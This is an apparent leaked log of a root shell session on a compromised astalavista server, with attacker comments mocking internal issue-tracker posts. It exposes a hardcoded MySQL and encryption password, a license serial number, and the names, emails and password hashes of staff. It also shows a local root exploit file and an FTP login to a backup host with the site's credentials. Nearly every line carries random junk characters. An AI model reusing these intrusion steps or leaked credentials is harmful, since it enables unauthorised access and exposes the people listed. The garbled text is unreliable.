$conxPassword = ‘cXvB3981′; // MySQL password& K: @0 o+ X; z
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish C# V+ x6 v8 K& N: |: K; l" ?4 d" O
?>+ n M* A5 {* J
! Y) {. H) s4 v4 ^+ V6 e6 k
sh-3.2# cd ..
/ g' x6 ]9 Z. u" P0 q7 {: X% ? zsh-3.2# cd com- Q7 C" P- D: |; c1 V" ]$ F- M
sh-3.2# ls -la2 l7 R8 o) \' F) a0 |6 O. X
total 141208% w- y; N1 A' G3 z1 Q
drwx–x–x 10 com com 4096 Apr 28 12:40 .
5 d* J" P/ n: ]1 h* W( [drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
) X; @* m; L G( \& H: Jdrwx—— 2 com com 4096 Jun 4 04:04 backups: f; c. w% [/ t! h' C
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
, X: e! a& }# U) [: A$ I6 k. Jdrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
) L; Z1 z( V2 X-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
6 \$ R( }1 r! q! @2 ?! R7 T-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
1 P# f6 G: r8 }" t+ Z0 K1 `-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile8 q+ K1 |2 j; D2 L+ Z- l
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
, `, v. p( m$ D, G. [; s% u& gdrwx–x–x 3 com com 4096 Jan 29 2008 domains
9 b/ v7 z( J) p6 @6 b$ w" L-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed9 r- a4 z+ z/ U# j, U
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap3 X7 D- |" @' M
-rw——- 1 com com 69 Nov 18 2008 .lesshst
) s( W/ q* h- udrwx—— 2 com com 4096 Sep 24 2007 mail0 V% N0 e1 E7 F& i7 m
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history$ ~( V' _% e2 i. t
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp/ v" f; L- s) X
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
+ B$ b( [/ v2 H5 w6 G& v-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
# t) G. z' j5 A& rdrwx—— 2 com com 4096 Aug 26 2008 .ssh# |% d2 y- S( Z6 S1 z
-rwx—— 1 com com 8515 Feb 10 2008 t
7 U6 a9 F$ ]* z-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c* {* m% d! d* L# Y. H$ I/ E5 j! W
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp. t: O/ A* ~5 c# t2 N6 _
-rw-rw-r– 1 com com 617 May 20 2008 .toprc2 [$ V# r U" h( T
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
- C8 M+ R5 m9 e* N6 S$ A& K. L) b" d# s$ A-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
4 _- D2 z+ c& n4 [; k-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
G" u& w/ m+ u7 v. ]' g0 V( a2 g
' H6 l) L, n) @+ msh-3.2# head t.c+ B4 U# H/ {# O
/*
2 f' S4 c& j# K& `* jessica_biel_naked_in_my_bed.c
: `+ U6 l* F6 ^*" z( W* s6 v3 l& B8 ^! Y# |
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.# s5 Z4 R- J5 s) t' h) {+ p% i
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
' A \6 Y8 e& Z I1 c k( X Y* Stejnak je to stare jak cyp a aj jakesyk rozbite.
0 t7 J' Z6 r* u7 A! J& v*
4 [" g1 |* d, q- Y8 e& W& x2 n! Q* Linux vmsplice Local Root Exploit
c: P: c5 [4 _* By qaaz7 O5 k% A% M" N# [4 k( W
*3 J1 K" i: O& m4 x+ p/ R: u, }1 S
. c( ^ o: i& ^! ^+ Hsh-3.2# cd /' t2 `+ {1 G2 E. U) T6 C; C
sh-3.2# ls -la5 }$ H }" \' n+ }0 B
total 360
6 y9 u/ A' A9 g; b* Kdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
. z; p, [2 M9 T. J" hdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..7 S0 \/ D3 G6 q+ {5 y) D$ y! ~/ T6 \9 G
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group* y! T, K+ G5 a$ }! Y3 ^0 F5 o
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user9 @; ]: M0 ~9 x, `) Y
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
# p$ d* K# j7 G1 g1 _. C-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
& D& L2 t) ~ o3 X! O3 _+ Z-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
. N$ z9 ]3 o: ~" ]$ [4 j% Kdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup
" K4 m( i# _" B% G0 g( F. @drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
% f6 ?- ^/ E3 x8 ^! r$ s n( Wdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
9 ^/ O' j7 B; \7 ]3 {0 f, Edrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev' B* e( u s3 Y' M% R( j) H k
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc/ F& a0 ?% |" f2 W, d7 A
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home( k" h$ r6 s- Q- A3 K& a& e$ _
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf4 j: `6 K8 ~/ N2 A/ s& J0 B) s6 B
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
; X9 I, P$ `( @) X. Jdrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib641 s- z- C; A! [+ p2 {$ e( @
drwx—— 2 root root 16384 Sep 11 2007 lost+found
$ D7 l' d, D+ P: M7 p% S2 Fdrwxr-xr-x 2 root root 4096 Mar 11 17:56 media
( q* n8 l4 \, }: Q9 Hdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc. X8 S! d5 d% h( c& C+ E
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt' X5 k# t& l* p( C3 h7 D1 q& T2 U
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg9 J- P5 [* l1 v
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
& G: x- [; ~. P) x5 c7 Zdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
3 |0 w* Q. |/ L9 |" o$ vdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc4 w6 }. t% S4 B: ~+ l F% [- V0 F
drwxr-x— 15 root root 4096 Jun 4 08:40 root: \& m5 S& m; |/ z; M: `
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
4 X* z0 c6 a' A, tdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux2 }7 Q: P* [( Y5 y- P1 G
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
+ z8 W3 O4 z) Xdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
5 R" `1 W3 q% e6 M! i Pdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
5 X/ ]6 ?. x" N, A# Edrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr: D1 q8 B7 ]- ~ Z
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var; r! d3 o4 c9 l) e* Y. D
* B+ L" L& o& @0 [9 o9 q6 Psh-3.2# cd opt* _+ B/ v# j- i" }4 ^5 c I
sh-3.2# ls -la
) a; f0 B3 m7 A: B3 Atotal 200 @8 P) s$ f/ R+ j, h2 q4 m
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
4 |& d' P$ M& U2 Q* ]drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..$ M& d, u0 F0 h6 J) b) _* `0 Q
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
: u6 h. b5 f) v$ o5 J' K6 y0 B/ |; A( J! m0 g" B+ |3 h
sh-3.2# cd lsws/
. k- Y F, U. `9 _4 q8 v, P( ~sh-3.2# ls -la+ T1 R! m1 W1 I- [% u7 ?
total 108
: c5 c" y; G0 W" \* m. V: Odrwxr-xr-x 15 root root 4096 Mar 20 2008 ./ s2 C& B0 d2 R* m
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
3 w6 K- @# k [1 ]2 Ydrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
( M( Q6 w! ^( {, ]' cdrwxr-xr-x 13 root root 4096 May 29 15:10 admin
, Z/ M% h( q" A3 c! w1 Fdrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
8 X' _3 Q/ g- T9 \) X I3 K9 P, ~drwxr-xr-x 2 root root 4096 May 29 15:10 bin
' C# N% S" w/ Y5 ndrwx—— 4 apache apache 4096 Jun 3 02:43 conf/ k1 {, U& U# Q" M' v2 J \
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT4 d) H( A' v" U5 X5 b% Y
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
( j! s$ i9 f+ [0 b8 O6 bdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
' |& x/ Y( k; a9 u# j3 rdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
: L* E7 c: L! p-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE0 B0 p, v% C. _& p& W& q& p2 X7 @7 U
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
4 a6 c j, q5 @ A-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
* R0 k1 C- u, Y. i& F0 p-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
- r! U: b7 y) j ndrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
" f$ _- h E- S' J ^& Ddrwxr-xr-x 2 root root 4096 Mar 20 2008 php# T( e2 E r9 N5 s- l
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild! k9 L2 |8 r0 K: r; g
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
3 C) q1 e. ~+ z- M-rw-r–r– 1 root root 6 May 29 15:10 VERSION
. F$ t% `' b9 u$ n) ?" E7 [7 X Y; N/ D! v. E" X2 b3 k5 u6 K" s" Q+ @; I
sh-3.2# cd conf$ a3 a7 p3 V% c
sh-3.2# ls -la
3 l) H& }( y8 e" p1 c0 X& ototal 48
8 u# p0 k$ f/ ?9 H, p+ tdrwx—— 4 apache apache 4096 Jun 3 02:43 .
, @7 M1 u- ^; ^1 S. m1 k3 Odrwxr-xr-x 15 root root 4096 Mar 20 2008 ... \0 \1 e* |+ ~; \7 v* `7 c
drwx—— 2 apache apache 4096 Mar 20 2008 cert/ j% V. _$ ~( z% y$ |) z7 g
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml* l/ f8 s% ?, p% }0 R
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak/ J: U4 C; o3 @" J: @1 l7 k2 q
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last* v: J3 o: g" t, t
-rw——- 1 apache apache 256 May 29 15:10 license.key
9 w+ c; u' Z4 z1 U-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
+ H/ w1 G8 y9 V-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties! E8 t3 D7 a+ S
-rw——- 1 apache apache 20 May 29 15:10 serial.no# d+ ^& }' E3 O" X; f
drwx—— 2 apache apache 4096 Mar 20 2008 templates
3 _+ C0 r5 g, W) a; e, ]3 G4 [* [" g" F% a
sh-3.2# cat serial.no5 D6 A3 c2 J) I/ [0 L$ \/ b! b: q
IbDl-oVsO-CKqL-wVRa
+ a: d% A1 m4 ~" y" z) G% `. U
0 t4 `. X9 Q1 z `sh-3.2# mysql
9 H3 t- R( r8 X# W& ~3 E/ H5 ZWelcome to the MySQL monitor. Commands end with ; or \g.3 G# {& C- d+ R- V6 U* z$ y" t
Your MySQL connection id is 286844
4 a5 ~' c+ |2 ?. p. uServer version: 5.0.45-community-log MySQL Community Edition (GPL)
* I2 w9 G9 ~7 _5 F0 U; P& ]" e( O" o( C8 K+ ?8 L
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
- u, m2 Y; g" E: f7 E: M2 o. A- M
mysql> show databases;
2 `: v, w: @0 q+———————–+
) e' S% |2 | s+ ?: m& a| Database |# X( z* |: V0 I9 ?1 r& q) n
+———————–+
; {8 w; M c5 b* {# a. a. z8 C| information_schema |
7 ^3 W1 S: L8 N W| astanet_ads |, R, O3 b- F3 g# C0 g$ Y
| astanet_mailing_lists |6 D* @* n7 W- z& d# Q
| astanet_mediawiki |! d! Q6 y4 L# j; _/ w( d
| astanet_membersystem |
* I5 `, e$ X) M9 k4 N" e3 M| com_contrexx |
) b7 m$ h$ X% Q5 U- z4 ?! L3 A| com_contrexx2 |% k Y0 i# Y! H" ?4 ?8 \/ @
| com_contrexx2_live |
5 Y) t# l) o6 l9 `4 Y4 t6 t| da_roundcube |
' S( p$ Q, V. z| dolphin |* f- C* }5 o3 U# ~
| ideapool |( A5 H8 K9 p7 @8 p3 p
| mysql |
$ \ \2 Z+ p1 t. g0 S( f9 |, z3 E6 `| test |
- k6 I1 y4 E- E; ~( U' T: `| yourmaster |
' a& o0 \" }1 Y! h+ [+———————–+
' g$ N6 P/ ^8 U8 z0 b8 l8 n14 rows in set (0.00 sec)
1 G; w1 |8 Z7 I' U. d4 ^6 @1 `. [7 ]
, ~* n' W6 N( |2 T8 c7 Kmysql> use ideapool
- i& x; n5 S' G( Y* v2 z% TDatabase changed' A) i: e# v% k7 B0 g7 }# @1 o1 {1 {/ u2 z9 O
mysql> show tables;& \; R2 `- h% p% G+ E
+———————————–+0 P: D3 p9 M9 Y. C
| Tables_in_ideapool |, B7 c4 A) d4 p ^- X
+———————————–+5 V) w! b7 Z6 e- q2 \: w
| eventum_columns_to_display |+ O2 B; t8 }; P1 Z' F2 _
| eventum_custom_field |1 `7 M7 ~& _; s) w
| eventum_custom_field_option |
/ u# Y, d1 K1 Z4 ~" ?| eventum_custom_filter |
/ S5 p5 d( ?2 W" u8 c! D| eventum_customer_account_manager |
$ X7 ^5 Z' u0 o; w+ a3 \* s7 j| eventum_customer_note |
# w3 J U k- ?% e0 n| eventum_email_account |
% W% @" _5 s8 i: i9 \1 C| eventum_email_draft |
( U5 _: x7 E0 R4 O| eventum_email_draft_recipient |
5 r! V3 J$ t4 y- A* K0 m| eventum_email_response |7 ]# I2 K4 l p7 Q
| eventum_faq |6 Q( x9 o! I0 F, t, I& m5 Y2 t' _
| eventum_faq_support_level |- j2 e) f, z7 T: y) A
| eventum_group |. a- X( }1 i0 I, }
| eventum_history_type |
8 P8 d1 ^# j1 L8 S3 z| eventum_irc_notice |" n# A# w8 r8 G7 ?# C; S
| eventum_issue |
8 q2 a" R/ T! Y$ p| eventum_issue_association |' F9 w/ t" h! H+ j5 n7 s
| eventum_issue_attachment |0 K/ Y; c3 G5 l" W h8 Y$ J2 v: y
| eventum_issue_attachment_file |% ?$ f& P+ `4 r4 _
| eventum_issue_checkin |
4 t8 ~7 U) Z) ]9 G| eventum_issue_custom_field |2 T! f+ ]8 q) a- ~& K$ T
| eventum_issue_history |
# j; m7 x- G+ Z+ k! x7 C/ p% w| eventum_issue_quarantine |
- F* @' L- c" P+ ], ^| eventum_issue_requirement |
" R, i" L/ q. [6 {. l| eventum_issue_user |
9 T* }: h* f+ y5 N8 I2 o| eventum_issue_user_replier |
. ^: t {- o$ g% D; D3 a8 D/ N6 y| eventum_link_filter |" J( P' _, Y9 n- x( s6 {
| eventum_mail_queue |
$ w2 b4 O1 A9 K' ^6 t| eventum_mail_queue_log |
/ |$ `4 t( T; j; c A. l7 p3 @| eventum_news |8 F5 @+ r& L0 }9 o- \1 n
| eventum_note |
' E0 M3 g' {% H; e/ O# }" V| eventum_phone_support |+ L. ?' a$ }3 T/ C
| eventum_project |& y6 S+ f7 W. {/ f
| eventum_project_category |
9 L ]& ~0 c3 e2 x/ B| eventum_project_custom_field |
. [2 d- T2 @* d" t0 c9 K/ p+ f| eventum_project_email_response |
& r! p, f3 W7 f8 K6 m| eventum_project_field_display |5 r! O( U) ~; @& P$ C3 L$ K4 y9 Z
| eventum_project_group |( W1 X" ~( m- t2 `
| eventum_project_link_filter |- v K& d+ z: T T/ W
| eventum_project_news |5 Q! w( b! u7 I
| eventum_project_phone_category |
( a% U0 [) R5 n( r- R| eventum_project_priority |
0 y1 v# \% \. I: H& Z Y| eventum_project_release |1 M9 k7 Y8 E3 G& B# A
| eventum_project_round_robin |
0 s7 o! \' Z, i# s. o) m) q| eventum_project_status |7 B& R% _- R# ^
| eventum_project_status_date |# M+ f0 I) L7 y* N1 u, L" ^- ^
| eventum_project_user |
* ]1 N% L1 y. Z/ R, z7 b+ C| eventum_reminder_action |8 e/ f: S7 I2 V2 p( I4 V. \
| eventum_reminder_action_list |2 _6 U; b) g* f1 F* H
| eventum_reminder_action_type |
6 \& p9 ~, t) s- D: p1 K2 a( F| eventum_reminder_field |
, o1 k$ _# u2 ~! e| eventum_reminder_history |( q3 U* ?+ P# k2 T+ `1 u) m
| eventum_reminder_level |% x0 u; B5 r5 W* w
| eventum_reminder_level_condition |
& L) X" r" Y6 { ? ]| eventum_reminder_operator |! K& \! [6 x+ V/ R7 o
| eventum_reminder_priority |; e3 k" Z! k" k- @, ~+ E
| eventum_reminder_requirement |
7 C- K& i, b0 }6 v+ @9 i6 M) Y| eventum_reminder_triggered_action |
8 }& T( Q" a c. c9 w& `8 W3 G| eventum_resolution |
" R7 ^+ r% t5 A" b| eventum_round_robin_user |
0 O# n/ m5 ~" a# y; V$ }| eventum_search_profile |
2 ^) t9 H0 n) ?/ J; D| eventum_status |$ N7 P" B) P$ x5 ]! L! b4 G3 e7 D W
| eventum_subscription |; T: T! v6 @& }+ }! W
| eventum_subscription_type |) o2 T% `! F) l+ P
| eventum_support_email |
. o$ t% Q- L6 T| eventum_support_email_body |& p. o# o: a$ H2 t2 Q; q
| eventum_time_tracking |
2 S" p- ]0 _1 z# m| eventum_time_tracking_category |& @1 B1 Z0 X4 r, ?% l, F. O
| eventum_user |7 `0 N1 S: f# y/ c
+———————————–+
. {: F P1 o! Y+ s" q+ z69 rows in set (0.00 sec)
/ a; w1 r4 k1 n% J
- a& z2 y7 Q& K) a* Omysql> describe eventum_user;. e: l$ p6 W4 D
+————————-+——————+——+—–+———————+—————-+7 k; ]4 y+ O8 B6 n; z' x. s8 S
| Field | Type | Null | Key | Default | Extra |& F4 h5 r( _1 R9 {* [8 J. A0 a
+————————-+——————+——+—–+———————+—————-+! Q- h+ U. ?4 D; Q) F- j# @
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |+ u- F* R- L; e$ G1 W, G0 v- n: ~
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
5 u" X0 t. l, J& _| usr_customer_id | int(11) unsigned | YES | | NULL | |% d2 k3 |2 ]) L2 I+ |( `
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |* c$ J1 t3 p F. k
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |3 k0 t" g! O4 r/ ~) q& t3 z& E
| usr_status | varchar(8) | NO | | active | |
3 _ f' w# ~* d E3 z| usr_password | varchar(32) | NO | | | |# C5 D1 @3 [/ f
| usr_full_name | varchar(255) | NO | | | |
5 U% d- P% d$ z% _| usr_email | varchar(255) | NO | UNI | | |
# I) i8 S, d& H8 c% a) Y/ m| usr_preferences | longtext | YES | | NULL | |
b: W& C9 q7 d p+ n9 ~0 b| usr_sms_email | varchar(255) | YES | | NULL | |# o" Y2 I/ _: Q1 `- @+ X& e
| usr_clocked_in | tinyint(1) | YES | | 0 | |- E3 R# a5 }7 F$ [- @8 q6 e
| usr_lang | varchar(5) | YES | | NULL | |8 o0 }3 n- {9 J+ ]+ H. ^
+————————-+——————+——+—–+———————+—————-+
8 Y- Z3 L1 d8 R* B+ Z2 O13 rows in set (0.00 sec)
/ \/ i1 w, M9 o- \8 x" G
, J( m+ b& Q. S8 G! V. e& Jmysql> select usr_full_name,usr_email,usr_password from eventum_user;
; L; I7 \4 M! y" e+———————-+——————————-+———————————-+1 A+ c) ]9 i' L: M8 U
| usr_full_name | usr_email | usr_password |
. Q/ h! v, o/ ~$ ^" O3 X ^5 \+———————-+——————————-+———————————-+9 Z+ u9 [/ Y7 l; v/ h! N
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |, \, b7 F3 g5 s# r
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |8 }* U! _$ o6 x( U# I6 B* g( b& u/ j
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
- ]! P9 P) d- b. B+ z7 W| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |, @. a( k2 w* m3 T( w* D) ~
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |) l) u/ k# j' c, {/ j
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |! n ?) G3 D$ G- Q. ]% t. P
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |) D3 x' t7 ?: q
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
2 H) O1 l6 \2 l| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |5 v% S8 Y" f6 s6 ?2 S
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |: y/ f% U0 n3 m, a8 V
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
/ u/ b: D0 h! J4 M- O- g7 @| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |+ {/ @9 K8 I7 u" G D) ]
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |$ D, t% Y: K9 e% ~
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |2 O& H. ^6 Z& m: b) ? H/ y$ J
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |4 n8 S% p& a$ E. e( l
+———————-+——————————-+———————————-+
- m4 B5 d L' f& \; D5 X15 rows in set (0.00 sec)
/ a) L0 h8 e2 \ U) M# l: ?4 H
. @- f# d3 l' |. g; G9 l Pmysql> select iss_description from eventum_issue where iss_id = 43;- j$ `7 _" X7 u7 X4 ]$ |& G
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
9 @" O" H) S8 {( g: F( u& X; f/ p| iss_description 1 M% u2 p7 f& n1 b8 G r* Q5 W& w. |
|+ N. L9 e/ T8 t0 S4 Y" q
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+5 \, g) y, u: ?
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be/ V) U8 D- `" ~4 z9 w4 B/ U
connected for 90 mins… 120mins… so what i propose is something like:( f0 F( T: H2 j8 o6 l
链接标记[url]http://www.surfthechannel.com/[/url]
4 f4 X( ~- F1 Xsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system z& |* I7 G. L# [ A
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
0 q- N# C, t- h1 ~' `break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
* T ^( W, d U1 u& Tif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
8 ] C6 v- T2 f. w& C o2 g" }' j
We could also put advertisement during play on the flash video player itself… extra $$…
2 U1 A6 W/ v9 c0 i% K- W) I! a
5 N* k0 `5 l2 t" rBy sykadul |3 e; ^# F$ Q8 \4 K
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+# @# \( H6 W, m. Z& [
1 row in set (0.00 sec)
2 w2 y `: b5 }5 Y; c) \5 Y" U& D* B1 T- s0 L! S5 \! V
// Money and extra $$ is all they care about. remember that.- M$ Q6 C0 b2 A, }! H! Q) W
) [( [# O k. ~# T4 y9 ]# Z9 ]7 Y
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;1 Q" M% W1 {3 V6 ^# n9 }, Z0 R
+————————+——————————————————————————————————————————————————————————————————————————————-+
- g! g; U2 v7 I: b| iss_summary | iss_description . K" c9 @4 E: v: c
|. M+ L: c2 I* S' k6 ^
+————————+——————————————————————————————————————————————————————————————————————————————-+8 K# }7 M5 e& b- z' r! h) `% k
| Forum for REAL EXPERTS | Hello,
, c0 l6 C9 M' F- L8 C# Z& Y7 f# [7 E; Q. ]( ~, w
Ishtus and I,
: T; H+ d. W( e1 }& q& N4 h' C# \+ E! u4 O% a- r
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide- F% s4 z6 w* D# O' n& e+ u3 E7 B- P
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc.." K: H, Y5 i6 V: N
9 `# |% h: R1 g# {( MOne example a friend of mine from coresecurity.com!3 @: e$ l$ ]) D
$ Z5 v1 Z# z4 k' x' l. `' x9 A9 wWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
4 _# O! a6 @: o+ Q# Z F
8 N8 X" i1 n% E* Q/ l. U|
9 W. C& T3 z; y! I1 }2 x+ U/ t+————————+——————————————————————————————————————————————————————————————————————————————+
. B& N1 Q9 n- { O) c$ C1 row in set (0.00 sec). v, s: U% T J& ?
7 N% _6 `. F3 ]. b' b
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
% a( \; C! _& v8 w' t7 M. c6 _& s. D4 J: L. f4 N
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
. p+ [( t# ^9 f7 L W3 N' ~+——————+———————————————————————————————+
% V9 y+ ?' ?( o5 x. {4 o! ~" R' ~| iss_summary | iss_description |
, f* W; t; `9 I/ z$ C+——————+———————————————————————————————+
2 i9 H5 Y5 B: c$ O8 l. z, T: ^5 [* k| Website guidance | Virtual Girl which guides you trought the website., N, l5 N3 I5 Q. `$ y
5 q) f4 \3 }! [/ h( f! A3 u
We need a girl with who you can ( talk )!!!
. j+ n- V* N" M4 h0 d V, SAlso for the News!
5 G5 [1 m, g( D4 c2 xSo my suggestion is a girl who read you the news loud if you like! R0 x6 ?# U- l+ j2 O7 W4 W
you can choose between read yourselfe or she read it for you or both!
8 {0 j& n9 @. j: _- ~% J
% Z! J, ]2 ]0 {& |. BGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
% X1 ^9 S9 l% X) [
% |) z" J9 S- b @, ?Have a look on the example girls!!9 W3 N! t& v/ g3 O( g4 x* j# U
; `$ a' m4 ?( h+ A6 |1 {
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
- D! j3 B5 V! m5 C f
) e) J: n" C) S% p( X P# oor that9 D( y. e9 y; Q; F% ?" Q
4 H& G: B6 i) p# z( u/ f
链接标记[url]http://www.yellostrom.de/[/url]
5 m9 F1 g3 q7 F8 h4 N/ V; O9 S4 m2 L. S6 S4 p
|
" Y O8 b3 E3 m+ C+——————+———————————————————————————————+
" @$ D; i; A1 P& g, n- z1 row in set (0.00 sec)1 w% ]4 z( i/ G2 b$ y' L* U
7 } q' Z$ S7 Z$ C1 V1 X
// ha ha.
X" \' ?* v/ E g( P! x0 D7 C
/ y- K& Z4 s. ]* j/ m9 tmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
, ^/ U7 n/ U0 n* b j+————————–+———————————————————————————————————–+% Z9 n: z! B) k; o5 {9 V# H
| iss_summary | iss_description | @+ r) u" N3 `2 R' i+ U
+————————–+———————————————————————————————————–+2 p0 v1 k; H8 L5 O% P% E& L8 p
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
6 W; Z9 J+ W+ `% H+————————–+———————————————————————————————————–+
6 z+ a n0 |- F8 a0 l8 j* ?. L |1 row in set (0.00 sec)/ }! I# I, J9 b" p! x
2 t" k- _0 l( [# }// LOL.
% B8 g& I* ^: o3 u& }8 L) r* |0 `0 } q& J4 x% Q j4 `5 e
mysql> exit
' H- E' ?! y; C+ _ O3 IBye* Z8 M! c" t* M
9 X6 d4 @4 A' j- D( T5 X/ T! Jsh-3.2# ftp 212.254.194.163; _4 z% e' c m
Connected to 212.254.194.163.( v# o: G% m0 r" H# g% b
220 BackupCOM_VW FTP server ready.6 f! g, V* t/ A7 l/ y' o( H# i
504 AUTH: security mechanism ‘GSSAPI’ not supported.
7 J: n; P4 I; B: Y) z504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
0 `* X8 E; F' G$ X, `) n3 H* nKERBEROS_V4 rejected as an authentication type
1 }, V+ T0 h" i+ `2 wName (212.254.194.163:root): astalavista.com3 M+ \9 k/ {' V; O4 j% `& Z
331 Password required for astalavista.com./ R6 u+ H! P. B2 U0 E
Password:3 G; I/ Y4 R9 D; ]3 _, c+ g
230 User astalavista.com logged in.+ [- M! b: h$ o# H" C, \2 c0 \% n
Remote system type is UNIX.: A5 i- O6 X5 K% d
